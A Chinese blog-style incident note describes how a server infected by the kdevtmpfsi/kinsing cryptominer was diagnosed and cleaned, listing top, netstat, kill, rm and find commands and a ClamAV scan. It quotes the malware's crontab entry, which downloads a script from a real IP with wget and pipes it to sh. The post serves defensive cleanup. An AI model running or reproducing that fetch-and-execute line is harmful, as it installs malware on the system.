记录kdevtmpfsi挖矿病毒处理记录和方法

病毒名称:kdevtmpfsi

状态:CPU爆满,导致线上服务宕机。

图片是盗的,进程占用是真实的。

 

 记录kdevtmpfsi挖矿病毒处理记录和方法_第1张图片

 

 

 

 

 

 

1、# top

     查看cpu占用情况,找到占用cpu的进程     最后是  kdevtmpfsi

2、# netstat -natp 

     根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了

此时,挖矿脚本大概率定时在你的crontab里面。

crontab -l ,发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

查看这个进程运行状态

systemctl status 3127

 记录kdevtmpfsi挖矿病毒处理记录和方法_第2张图片

systemctl status 3127

 

ps -aux | grep kinsing

 

ps -aux | grep kdevtmpfsi

 

kill  -9   3127

 

cd  /tmp

 

ls

 

 rm -rf kdevtmpfsi 

 

rm -rf /var/tmp/kinsing  记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令

 

find / -name kdevtmpfsi

 

find / -name kinsing

 

进入/var/spool/cron  查看是否有相关的木马定时任务在执行  有的话删掉再重启下crontab

 

后续工作溯源,找到程序漏洞,封禁访问ip,不正常ip。源程序下载。

使用clamav对整个Linux做全盘扫描,确定被感染文件并删除。

 

 查找守护进程文件变种名字。

 

全部删除 

 

find / -name "kinsing*" | xargs rm -rf

 

至此杀毒工作基本进入尾声。后面几天观察服务器服务,进程是否异常。

你可能感兴趣的:(记录kdevtmpfsi挖矿病毒处理记录和方法)